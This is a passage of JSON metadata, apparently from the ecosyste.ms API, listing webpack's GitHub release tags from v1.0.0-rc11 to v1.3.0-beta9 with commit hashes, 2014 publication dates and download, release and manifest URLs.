1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/web